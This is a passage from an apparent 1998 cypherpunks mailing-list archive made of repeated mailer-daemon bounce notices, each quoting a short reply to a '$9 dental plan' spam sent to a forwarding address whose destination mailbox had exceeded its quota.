as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:00 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:01 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:46 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:13 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28025@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:02 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:02 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:03 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:47 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:17 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28056@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:08 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta3.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:08 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta3.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:09 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:54 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:18 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28068@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:10 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:10 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:11 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:56 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:59 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28077@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:12 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:12 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:13 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:57 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:19 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28090@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:14 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta3.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:35:14 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta3.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:35:15 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:41:00 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:40:45 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA12760@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:17 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:17 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:18 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:32 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:40:51 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA12780@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:20 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:20 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:21 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:35 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:40:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA04447@mx05.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:28 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx05.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:28 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:29 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:36 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:00 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA03982@mx02.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:32 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx02.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:32 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:33 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:38 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:55 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA12883@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:38 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:38 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:39 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:50 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311237.HAA12882@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:37:38 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:37:38 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:37:39 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:53 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:37:41 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311241.HAA01831@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:41:11 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:41:11 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:41:12 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:32 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:39:34 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311241.HAA01880@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:41:18 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
